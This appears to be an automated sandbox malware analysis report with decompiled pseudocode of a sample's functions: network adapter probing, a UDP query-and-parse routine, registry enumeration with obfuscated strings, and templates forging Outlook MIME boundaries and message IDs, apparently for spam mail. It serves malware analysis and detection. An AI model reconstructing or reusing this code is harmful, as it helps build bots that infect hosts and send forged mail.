                                                                                                                                  				struct HINSTANCE__* _t48;
                                                                                                                                  				_Unknown_base(*)()* _t49;
                                                                                                                                  				void* _t50;
                                                                                                                                  
                                                                                                                                  				_v20 = 0;
                                                                                                                                  				_v28 = 0;
                                                                                                                                  				__imp__#11("123.45.67.89");
                                                                                                                                  				_v24 = __eax;
                                                                                                                                  				_t48 = LoadLibraryA("Iphlpapi.dll");
                                                                                                                                  				_v16 = _t48;
                                                                                                                                  				if(_t48 != 0) {
                                                                                                                                  					_v12 = GetProcAddress(_t48, "GetAdaptersInfo");
                                                                                                                                  					_t49 = GetProcAddress(_t48, "GetIfEntry");
                                                                                                                                  					_t30 = GetProcAddress(_v16, "GetBestInterface");
                                                                                                                                  					if(_v12 == 0 || _t49 == 0 || _t30 == 0) {
                                                                                                                                  						FreeLibrary(_v16);
                                                                                                                                  						goto L21;
                                                                                                                                  					} else {
                                                                                                                                  						 *_t30(_v24,  &_v20);
                                                                                                                                  						_t34 = GetProcessHeap();
                                                                                                                                  						_v24 = _t34;
                                                                                                                                  						if(_t34 == 0) {
                                                                                                                                  							L21:
                                                                                                                                  							_t32 = 0;
                                                                                                                                  							L22:
                                                                                                                                  							return _t32;
                                                                                                                                  						}
                                                                                                                                  						_t50 = HeapAlloc(_t34, 0, 0x288);
                                                                                                                                  						if(_t50 == 0) {
                                                                                                                                  							goto L21;
                                                                                                                                  						}
                                                                                                                                  						_push( &_v8);
                                                                                                                                  						_push(_t50);
                                                                                                                                  						_v8 = 0x288;
                                                                                                                                  						if(_v12() == 0x6f) {
                                                                                                                                  							_t50 = HeapReAlloc(_v24, 0, _t50, _v8);
                                                                                                                                  						}
                                                                                                                                  						if(_t50 == 0) {
                                                                                                                                  							L18:
                                                                                                                                  							FreeLibrary(_v16);
                                                                                                                                  							if(_v28 == 0) {
                                                                                                                                  								goto L21;
                                                                                                                                  							}
                                                                                                                                  							_t32 = 1;
                                                                                                                                  							goto L22;
                                                                                                                                  						} else {
                                                                                                                                  							_push( &_v8);
                                                                                                                                  							_push(_t50);
                                                                                                                                  							if(_v12() != 0) {
                                                                                                                                  								goto L18;
                                                                                                                                  							}
                                                                                                                                  							_t41 = _t50;
                                                                                                                                  							while( *((intOrPtr*)(_t41 + 0x19c)) != _v20) {
                                                                                                                                  								_t41 =  *_t41;
                                                                                                                                  								if(_t41 != 0) {
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								L17:
                                                                                                                                  								HeapFree(_v24, 0, _t50);
                                                                                                                                  								goto L18;
                                                                                                                                  							}
                                                                                                                                  							if( *((intOrPtr*)(_t41 + 0x1a0)) != 6) {
                                                                                                                                  								_v28 = 1;
                                                                                                                                  							}
                                                                                                                                  							goto L17;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return 0;
                                                                                                                                  			}

APIs
• inet_addr.WS2_32(123.45.67.89), ref: 004019B1
• LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00401E9E), ref: 004019BF
• GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 004019E2
• GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 004019ED
• GetProcAddress.KERNEL32(?,GetBestInterface), ref: 004019F9
• GetProcessHeap.KERNEL32(?,?,?,?,00000001,00401E9E), ref: 00401A1D
• HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00401E9E), ref: 00401A36
• HeapReAlloc.KERNEL32(?,00000000,00000000,00401E9E,?,?,?,?,00000001,00401E9E), ref: 00401A5A
• HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00401E9E), ref: 00401A9B
• FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00401E9E), ref: 00401AA4
Strings
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: Heap$AddressProc$AllocFreeLibrary$LoadProcessinet_addr
• String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
• API String ID: 835516345-270533642
• Opcode ID: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
• Instruction ID: c689a3d9ae3379b0bfe51822f68a21815d588b76a9689f39126eb657c90dfffc
• Opcode Fuzzy Hash: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
• Instruction Fuzzy Hash: 39313E32A01219AFCF119FE4DD888AFBBB9EB45311B24457BE501B2260D7B94E819F58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 53%
			E00402A62(void* __ecx, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v44;
				signed short _v272;
				char _v276;
				long _v280;
				char _v284;
				signed short _v288;
				signed short _v292;
				long _v300;
				long _v304;
				intOrPtr _v308;
				signed short _v324;
				intOrPtr _v332;
				signed short _v336;
				signed int _v340;
				signed int _v344;
				void* _v348;
				signed short _v352;
				signed short _v356;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33; /* decompiler temporary, missing from the original declaration list */
				intOrPtr _t50; /* decompiler temporary (eax), missing from the original declaration list */
				intOrPtr _t53;
				signed short _t66;
				void** _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				signed short _t79;
				intOrPtr* _t81;
				signed short _t82;
				signed short _t83;
				intOrPtr _t86;
				signed int _t88;
				void* _t90;
				long _t91;
				signed short _t92;
				void* _t94;

				_t77 = __ecx;
				_t91 = 0;
				 *_a12 = 1;
				_t50 = HeapAlloc(GetProcessHeap(), 0, 0x1000); /* 4 KiB receive buffer */
				_t76 = _t50;
				if(_t76 != 0) {
					__imp__#23(2, 2, 0x11, _t78); /* WS2_32 ordinal 23 = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP) */
					_t79 = _t50;
					_v288 = _t79;
					if(_t79 == 0 || _t79 == 0xffffffff) { /* INVALID_SOCKET */
						HeapFree(GetProcessHeap(), _t91, _t76);
						_t53 = 0;
						goto L37;
					} else {
						_v304 = 0;
						while(1) {
							_v300 = _t91;
							if(_v304 != _t91) {
								_push(_t91);
							} else {
								_push(0x100);
							}
							__imp__#9(); /* WS2_32 ordinal 9 = htons */
							_t50 = E004026FF(_v8, _t79, _v12, _t50 & 0x0000ffff);
							_t94 = _t94 + 0xc;
							if(_t50 != 0) {
								goto L32;
							}
							_t86 = 0xc;
							_t50 =  &_v276; /* fd_set: fd_count = 1, fd_array[0] = socket */
							_v272 = _t79;
							_v276 = 1;
							_v284 = _t86; /* timeval: tv_sec = 12, tv_usec = 0 */
							_v280 = _t91;
							__imp__#18(_t91, _t50, _t91, _t91,  &_v284); /* WS2_32 ordinal 18 = select(0, &readfds, NULL, NULL, &timeout) */
							if(_t50 <= 0) {
								goto L32; /* timeout or error: no reply readable */
							}
							_t50 = E0040EE2A(_t77, _t76, _t91, 4);
							_t94 = _t94 + 0xc;
							__imp__#16(_t79, _t76, 0x1000, _t91); /* WS2_32 ordinal 16 = recvfrom(s, buf, 0x1000, 0, ...) */
							_t92 = _t50;
							_v324 = _t92;
							if(_t92 > 0 && _t92 > _t86) {
								_t81 = __imp__#15; /* WS2_32 ordinal 15 = ntohs */
								_t88 =  *_t81( *(_t76 + 2) & 0x0000ffff) & 0xf;
								if(_t88 == 3) {
									L34:
									 *_v44 = 2;
									L35:
									HeapFree(GetProcessHeap(), 0, _t76);
									__imp__#3(_v292); /* WS2_32 ordinal 3 = closesocket */
									_t53 = _v308;
									L37:
									return _t53;
								}
								if(_t88 != 2) {
									L16:
									if(_t88 != 0) {
										goto L32;
									}
									_t50 = E00402923(_t77, _t76, _t92);
									_pop(_t77);
									_v336 = _t50;
									if(_t50 == 0) {
										goto L32;
									}
									_v340 = _v340 & 0x00000000;
									_v344 = _v344 & 0x00000000;
									_t82 = _t50;
									_v352 = _t82;
									L20:
									while(1) {
										if( *((short*)(_t82 + 0x10a)) != 1 ||  *((short*)(_t82 + 0x108)) != 0xf ||  *((short*)(_t82 + 0x10c)) < 3) {
											L30:
											_t83 =  *_t82;
											_v352 = _t83;
											if(_t83 != 0) {
												_t82 = _v352;
												continue;
											}
											goto L31;
										} else {
											_t90 = HeapAlloc(GetProcessHeap(), 0, 0x108);
											if(_t90 == 0) {
												L31:
												_t50 = E00402904(_v336);
												if(_v344 != 0) {
													goto L35;
												}
												goto L32;
											}
											E0040EE2A(_t77, _t90, 0, 0x108);
											_t66 =  *( *((intOrPtr*)(_t82 + 0x110)) + _t76) & 0x0000ffff;
											_t94 = _t94 + 0xc;
											__imp__#15(); /* ntohs */
											 *(_t90 + 4) = _t66 & 0x0000ffff;
											_t33 = _t90 + 8; // 0x8
											E00402871( *((intOrPtr*)(_t82 + 0x110)) + 2, _t76, _t77, _t33, _v332);
											_t77 = _t66;
											if( *((char*)(_t90 + 8)) != 0) {
												_t71 = _v344;
												_v344 = _t90; /* append node to the singly linked result list */
												if(_t71 != 0) {
													 *_t71 = _t90;
												} else {
													_v348 = _t90;
												}
											} else {
												HeapFree(GetProcessHeap(), 0, _t90);
											}
											_t82 = _v356;
											goto L30;
										}
									}
								}
								_push( *(_t76 + 2) & 0x0000ffff);
								if( *_t81() < 0) {
									goto L34;
								}
								goto L16;
							}
							L32:
							_v308 = _v308 + 1;
							if(_v308 < 2) { /* at most two attempts */
								_t79 = _v292;
								_t91 = 0;
								continue;
							}
							goto L35;
						}
					}
				}
				return 0;
			}

APIs
• GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,761B4F20), ref: 00402A83
• HeapAlloc.KERNEL32(00000000,?,761B4F20), ref: 00402A86
• socket.WS2_32(00000002,00000002,00000011), ref: 00402AA0
• htons.WS2_32(00000000), ref: 00402ADB
• select.WS2_32 ref: 00402B28
• recv.WS2_32(?,00000000,00001000,00000000), ref: 00402B4A
• htons.WS2_32(?), ref: 00402B71
• htons.WS2_32(?), ref: 00402B8C
• GetProcessHeap.KERNEL32(00000000,00000108), ref: 00402BFB
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: Heaphtons$Process$Allocrecvselectsocket
• String ID:
• API String ID: 1639031587-0
• Opcode ID: 72f5f8f4b8a6e38625c08c3a78b0cfce54e590fe4137906a5456ad4f28646144
• Instruction ID: 51c4a8f8372388146ce05ee3fd67d3b8acfed2692fca977a8adbfce498b2b585
• Opcode Fuzzy Hash: 72f5f8f4b8a6e38625c08c3a78b0cfce54e590fe4137906a5456ad4f28646144
• Instruction Fuzzy Hash: FB61D271508305ABD7209F51DE0CB6FBBE8FB48345F14482AF945A72D1D7F8D8808BAA
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
Similarity
• API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
• String ID: -$9
• API String ID: 3451365851-1631151375
• Opcode ID: 54b7069774bb0cb7d3955371641dd9def0482dd4aec8b2fe72b736631d92e6e8
• Instruction ID: 47dd038e71b6e8d87cef41845c8892bd9c182dcfcc000af15c34b3d9f0a9e589
• Opcode Fuzzy Hash: 54b7069774bb0cb7d3955371641dd9def0482dd4aec8b2fe72b736631d92e6e8
• Instruction Fuzzy Hash: D3F14DB1E052299FDB24CF58DC89BEEB7B1BB44304F5481DAE019A7281D7789E80CF59
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
Similarity
• API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
• String ID: 9
• API String ID: 3455034128-2366072709
• Opcode ID: f34dfe748a1283b40b8cec42bfb9d1d5154c90a26b5fac5b30e95f034362d87d
• Instruction ID: 06cf0195d11e21c04b465d4908b5bf6feeea47427d092b283015566512795ab7
• Opcode Fuzzy Hash: f34dfe748a1283b40b8cec42bfb9d1d5154c90a26b5fac5b30e95f034362d87d
• Instruction Fuzzy Hash: 5DF16BF1E002299FDB24CF46DC81BAEB7B5BB85304F54449AE209A7241D738AE84CF59
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 77%
			E0040704C(intOrPtr _a4, signed int* _a8, int _a12, int _a16, int* _a20) {
				CHAR* _v8;
				void* _v12;
				signed int _v16;
				int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				char _v64;
				char _v363;
				char _v364;
				void _v400;
				intOrPtr* _t88;
				int* _t89;
				int* _t90;
				int* _t91;
				char* _t93;
				signed int _t96;
				signed int _t97;
                                                                                                                                  				long _t99;
                                                                                                                                  				signed int _t107;
                                                                                                                                  				int _t109;
                                                                                                                                  				int _t119;
                                                                                                                                  				int _t121;
                                                                                                                                  				int _t122;
                                                                                                                                  				int _t123;
                                                                                                                                  				signed int _t125;
                                                                                                                                  				signed int* _t130;
                                                                                                                                  				int _t136;
                                                                                                                                  				int _t149;
                                                                                                                                  				int _t155;
                                                                                                                                  				void* _t158;
                                                                                                                                  				signed int _t166;
                                                                                                                                  				int _t196;
                                                                                                                                  				signed int _t204;
                                                                                                                                  				int _t206;
                                                                                                                                  				void* _t207;
                                                                                                                                  				void* _t208;
                                                                                                                                  				void* _t210;
                                                                                                                                  				void* _t211;
                                                                                                                                  
                                                                                                                                  				_t88 = _a8;
                                                                                                                                  				_t167 = 0;
                                                                                                                                  				_v16 = 0x12c;
                                                                                                                                  				_v24 = 0x20;
                                                                                                                                  				_v364 = 0;
                                                                                                                                  				if(_t88 != 0) {
                                                                                                                                  					 *_t88 = 0;
                                                                                                                                  				}
                                                                                                                                  				_t89 = _a12;
                                                                                                                                  				if(_t89 != _t167) {
                                                                                                                                  					 *_t89 = _t167;
                                                                                                                                  				}
                                                                                                                                  				_t90 = _a16;
                                                                                                                                  				if(_t90 != _t167) {
                                                                                                                                  					 *_t90 = _t167;
                                                                                                                                  				}
                                                                                                                                  				_t91 = _a20;
                                                                                                                                  				if(_t91 != _t167) {
                                                                                                                                  					 *_t91 = _t167;
                                                                                                                                  				}
                                                                                                                                  				_t93 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
                                                                                                                                  				_t208 = _t207 + 0x14;
                                                                                                                                  				if(RegOpenKeyExA(0x80000001, _t93, _t167, 0x101,  &_v12) != 0) {
                                                                                                                                  					L21:
                                                                                                                                  					_t96 = E0040EE2A(_t167, 0x4122f8, 0, 0x100) | 0xffffffff;
                                                                                                                                  					goto L22;
                                                                                                                                  				} else {
                                                                                                                                  					_t97 = E00406DC2(_t167);
                                                                                                                                  					_push( &_v16);
                                                                                                                                  					_push( &_v364);
                                                                                                                                  					_push( &_v28);
                                                                                                                                  					_v32 = _t97;
                                                                                                                                  					_push(0);
                                                                                                                                  					_push( &_v24);
                                                                                                                                  					_t167 =  &_v64;
                                                                                                                                  					_push( &_v64);
                                                                                                                                  					_v8 = 0;
                                                                                                                                  					_push(0);
                                                                                                                                  					while(1) {
                                                                                                                                  						_t99 = RegEnumValueA(_v12, ??, ??, ??, ??, ??, ??, ??);
                                                                                                                                  						if(_t99 == 0x103) {
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t99;
                                                                                                                                  						if(_t99 != 0) {
                                                                                                                                  							L18:
                                                                                                                                  							_t25 =  &_v8;
                                                                                                                                  							 *_t25 =  &(_v8[1]);
                                                                                                                                  							__eflags =  *_t25;
                                                                                                                                  							_push( &_v16);
                                                                                                                                  							_push( &_v364);
                                                                                                                                  							_push( &_v28);
                                                                                                                                  							_push(0);
                                                                                                                                  							_push( &_v24);
                                                                                                                                  							_push( &_v64);
                                                                                                                                  							_push(_v8);
                                                                                                                                  							_v16 = 0x12c;
                                                                                                                                  							_v24 = 0x20;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _v24 - _t99;
                                                                                                                                  						if(_v24 <= _t99) {
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _v16 - _t99;
                                                                                                                                  						if(_v16 <= _t99) {
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _v28 - 1;
                                                                                                                                  						if(_v28 != 1) {
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  						_t107 = E0040EED1( &_v64, E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8));
                                                                                                                                  						_t210 = _t208 + 0x1c;
                                                                                                                                  						asm("sbb eax, eax");
                                                                                                                                  						_t109 =  ~_t107 + 1;
                                                                                                                                  						__eflags = _t109;
                                                                                                                                  						_v20 = _t109;
                                                                                                                                  						if(_t109 != 0) {
                                                                                                                                  							L23:
                                                                                                                                  							_v8 = E0040EE95( &_v364, E00402544(0x4122f8,  &E0041069C, 4, 0xe4, 0xc8));
                                                                                                                                  							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
                                                                                                                                  							_t211 = _t210 + 0x28;
                                                                                                                                  							__eflags = _v8;
                                                                                                                                  							if(_v8 == 0) {
                                                                                                                                  								__eflags = _v364 - 0x22;
                                                                                                                                  								if(_v364 == 0x22) {
                                                                                                                                  									E0040EF00( &_v364,  &_v363);
                                                                                                                                  									_t149 = E0040ED23( &_v364, 0x22);
                                                                                                                                  									_t211 = _t211 + 0x10;
                                                                                                                                  									__eflags = _t149;
                                                                                                                                  									if(_t149 != 0) {
                                                                                                                                  										 *_t149 = 0;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								_t196 = E0040EE95( &_v364, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
                                                                                                                                  								E0040EE2A(_t167, 0x4122f8, 0, 0x100);
                                                                                                                                  								__eflags = _t196;
                                                                                                                                  								if(_t196 != 0) {
                                                                                                                                  									_t119 = E0040ED77( &_v364, _a4);
                                                                                                                                  									__eflags = _t119;
                                                                                                                                  									if(_t119 != 0) {
                                                                                                                                  										 *_t196 = 0;
                                                                                                                                  										_t121 = E0040ED23( &_v364, 0x5c);
                                                                                                                                  										_v8 = _t121;
                                                                                                                                  										__eflags = _t121;
                                                                                                                                  										if(_t121 != 0) {
                                                                                                                                  											_t63 =  &_v8;
                                                                                                                                  											 *_t63 =  &(_v8[1]);
                                                                                                                                  											__eflags =  *_t63;
                                                                                                                                  										} else {
                                                                                                                                  											_v8 =  &_v364;
                                                                                                                                  										}
                                                                                                                                  										_t122 = E00406CAD(_v8);
                                                                                                                                  										__eflags = _t122;
                                                                                                                                  										if(_t122 != 0) {
                                                                                                                                  											_pop(_t204);
                                                                                                                                  											_push(0x8b00007e);
                                                                                                                                  											asm("lock xor esi, 0x55555555");
                                                                                                                                  											_v16 = _t204;
                                                                                                                                  											_t166 = _t204 >> 0x00000008 & 0x000000ff;
                                                                                                                                  											_t123 = E00406C96(_t204);
                                                                                                                                  											__eflags = _t123;
                                                                                                                                  											if(_t123 != 0) {
                                                                                                                                  												L57:
                                                                                                                                  												RegCloseKey(_v12);
                                                                                                                                  												__eflags = _a16;
                                                                                                                                  												if(_a16 != 0) {
                                                                                                                                  													E0040EF00(_a16,  &_v64);
                                                                                                                                  												}
                                                                                                                                  												_t125 = 0;
                                                                                                                                  												__eflags = _v20;
                                                                                                                                  												 *_t196 = 0x2e;
                                                                                                                                  												goto L34;
                                                                                                                                  											}
                                                                                                                                  											__eflags = _t166 - 0x40 - 0x3f;
                                                                                                                                  											if(_t166 - 0x40 > 0x3f) {
                                                                                                                                  												goto L57;
                                                                                                                                  											}
                                                                                                                                  											__eflags = (_t204 & 0x000000ff) - 0x10;
                                                                                                                                  											if((_t204 & 0x000000ff) >= 0x10) {
                                                                                                                                  												goto L57;
                                                                                                                                  											}
                                                                                                                                  											_t206 = _a12;
                                                                                                                                  											 *_t196 = 0x2e;
                                                                                                                                  											__eflags = _t206;
                                                                                                                                  											if(_t206 != 0) {
                                                                                                                                  												_t136 = GetFileAttributesExA( &_v364, 0,  &_v400);
                                                                                                                                  												__eflags = _t136;
                                                                                                                                  												if(_t136 != 0) {
                                                                                                                                  													 *_t206 = 1;
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  											_t130 = _a8;
                                                                                                                                  											__eflags = _t130;
                                                                                                                                  											if(_t130 != 0) {
                                                                                                                                  												 *_t130 = _t166;
                                                                                                                                  											}
                                                                                                                                  											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											__eflags = _a20;
											if(_a20 != 0) {
												E0040EF00(_a20, _v8);
											}
											_t125 = 0;
											__eflags = _v20;
											goto L34;
										} else {
											RegCloseKey(_v12);
											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											 *_t196 = 0x2e;
											goto L33;
										}
									}
									RegCloseKey(_v12);
									_t96 = 0;
									goto L22;
								} else {
									RegCloseKey(_v12);
									__eflags = _a16;
									if(_a16 != 0) {
										E0040EF00(_a16,  &_v64);
									}
									L33:
									_t125 = 0;
									__eflags = _v20;
									L34:
									_t96 = (_t125 & 0xffffff00 | __eflags == 0x00000000) + 1;
									L22:
									return _t96;
								}
							}
							RegCloseKey(_v12);
							__eflags = _a16;
							if(_a16 != 0) {
								E0040EF00(_a16,  &_v64);
							}
							_t96 = 1;
							goto L22;
						}
						_t155 = E00406CAD( &_v64);
						_pop(_t167);
						__eflags = _t155;
						if(_t155 == 0) {
							L17:
							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
							_t208 = _t210 + 0xc;
							goto L18;
						}
						_t158 = E0040F1A5( &_v64);
						_t167 = _v32 ^ 0x5e5e5e5e;
						__eflags = _t158 - (_v32 ^ 0x5e5e5e5e);
						if(_t158 == (_v32 ^ 0x5e5e5e5e)) {
							goto L23;
						}
						goto L17;
					}
					RegCloseKey(_v12);
					goto L21;
				}
			}
                                                                                                                                  0x00407297
                                                                                                                                  0x0040729a
                                                                                                                                  0x004072a3
                                                                                                                                  0x004072a9
                                                                                                                                  0x004072aa
                                                                                                                                  0x004072aa
                                                                                                                                  0x004072ac
                                                                                                                                  0x004072af
                                                                                                                                  0x004072b2
                                                                                                                                  0x004071cb
                                                                                                                                  0x004071cf
                                                                                                                                  0x004071cf
                                                                                                                                  0x0040728c
                                                                                                                                  0x00407208
                                                                                                                                  0x0040720e
                                                                                                                                  0x00407212
                                                                                                                                  0x0040721b
                                                                                                                                  0x00407221
                                                                                                                                  0x00407224
                                                                                                                                  0x00000000
                                                                                                                                  0x00407224
                                                                                                                                  0x0040713d
                                                                                                                                  0x00407142
                                                                                                                                  0x00407143
                                                                                                                                  0x00407145
                                                                                                                                  0x0040715e
                                                                                                                                  0x00407166
                                                                                                                                  0x0040716b
                                                                                                                                  0x00000000
                                                                                                                                  0x0040716b
                                                                                                                                  0x0040714b
                                                                                                                                  0x00407154
                                                                                                                                  0x0040715a
                                                                                                                                  0x0040715c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040715c
                                                                                                                                  0x004071b2
                                                                                                                                  0x00000000
                                                                                                                                  0x004071b2

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000101,761B43E0,?,761B43E0,00000000), ref: 004070C2
                                                                                                                                  • RegEnumValueA.ADVAPI32 ref: 0040719E
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0,?,761B43E0,00000000), ref: 004071B2
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 00407208
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 00407291
                                                                                                                                  • ___ascii_stricmp.LIBCMT ref: 004072C2
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 004072D0
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 00407314
                                                                                                                                  • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040738D
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 004073D8
                                                                                                                                    • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,004122F8,000000C8,00407150,?), ref: 0040F1AD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
                                                                                                                                  • String ID: $"
                                                                                                                                  • API String ID: 4293430545-3817095088
                                                                                                                                  • Opcode ID: d919dbd9af1343ac96c8c832437364b04d25ba813f015b914b967c8048a51357
                                                                                                                                  • Instruction ID: bdd769efad709bd93da993ba4a974553bca105625a5613f565cdc8f40f8c6bf1
                                                                                                                                  • Opcode Fuzzy Hash: d919dbd9af1343ac96c8c832437364b04d25ba813f015b914b967c8048a51357
                                                                                                                                  • Instruction Fuzzy Hash: 8FB17F71D0820ABAEB159FA1DC45BEF77B8AB04304F10047BF501F61D1EB79AA94CB69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E0040AD89(void* __ecx, void* __eflags) {
                                                                                                                                  				signed int _t48;
                                                                                                                                  				signed int _t50;
                                                                                                                                  				void* _t53;
                                                                                                                                  				intOrPtr _t55;
                                                                                                                                  				void* _t76;
                                                                                                                                  				signed int _t77;
                                                                                                                                  				void* _t81;
                                                                                                                                  				CHAR* _t92;
                                                                                                                                  				void* _t94;
                                                                                                                                  				void* _t96;
                                                                                                                                  				void* _t98;
                                                                                                                                  
                                                                                                                                  				_t76 = __ecx;
                                                                                                                                  				_t94 = _t96 - 0x74;
                                                                                                                                  				GetLocalTime(_t94 + 0x50);
                                                                                                                                  				SystemTimeToFileTime(_t94 + 0x50, _t94 + 0x64);
                                                                                                                                  				E0040EE2A(_t76, _t94 - 0x110, 0, 0x80);
                                                                                                                                  				E0040AD08(_t94 - 0x110);
                                                                                                                                  				_t98 = _t96 - 0x184 + 0x10;
                                                                                                                                  				if(E004030B5() == 0) {
                                                                                                                                  					 *((intOrPtr*)(_t94 + 0x6c)) = "127.0.0.1";
                                                                                                                                  				} else {
                                                                                                                                  					_push(_t94 - 0x90);
                                                                                                                                  					 *((intOrPtr*)(_t94 + 0x6c)) = E0040A7A3(_t47, _t47);
                                                                                                                                  				}
                                                                                                                                  				_t48 = E0040ECA5();
                                                                                                                                  				_t77 = 0xe;
                                                                                                                                  				_t50 = E0040ECA5();
                                                                                                                                  				_t92 = "%OUTLOOK_BND_";
                                                                                                                                  				 *((intOrPtr*)(_t94 + 0x70)) = (_t50 & 0x00000001) + _t48 % _t77 + 0xb;
                                                                                                                                  				_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
                                                                                                                                  				while(1) {
                                                                                                                                  					_t103 = _t53;
                                                                                                                                  					if(_t53 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t55 = E0040EDAC(_t53 + 0xd);
                                                                                                                                  					_t81 =  *((intOrPtr*)(_t94 + 0x70)) + _t55;
                                                                                                                                  					__eflags = _t81;
                                                                                                                                  					 *((intOrPtr*)(_t94 + 0x60)) = _t55;
                                                                                                                                  					wsprintfA(_t94 - 0x70, "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX", _t55, _t81,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64));
                                                                                                                                  					wsprintfA(_t94 + 0x10, "%s%d", _t92,  *((intOrPtr*)(_t94 + 0x60)));
                                                                                                                                  					E0040EF7C(__eflags,  *((intOrPtr*)(_t94 + 0x7c)), _t94 + 0x10, _t94 - 0x70, 0x3e800, 0);
                                                                                                                                  					_t98 = _t98 + 0x40;
                                                                                                                                  					_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
                                                                                                                                  				}
                                                                                                                                  				wsprintfA(_t94 - 0x70, "%04x%08.8lx$%08.8lx$%08x@%s",  *((intOrPtr*)(_t94 + 0x70)) + 3,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64),  *((intOrPtr*)(_t94 + 0x6c)), _t94 - 0x110);
                                                                                                                                  				E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_MID", _t94 - 0x70, 0x3e800, 0);
                                                                                                                                  				return E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_HST", _t94 - 0x110, 0x3e800, 0);
                                                                                                                                  			}
                                                                                                                                  0x0040ad89
                                                                                                                                  0x0040ad8a
                                                                                                                                  0x0040ad98
                                                                                                                                  0x0040ada6
                                                                                                                                  0x0040adba
                                                                                                                                  0x0040adc6
                                                                                                                                  0x0040adcb
                                                                                                                                  0x0040add5
                                                                                                                                  0x0040adeb
                                                                                                                                  0x0040add7
                                                                                                                                  0x0040addd
                                                                                                                                  0x0040ade6
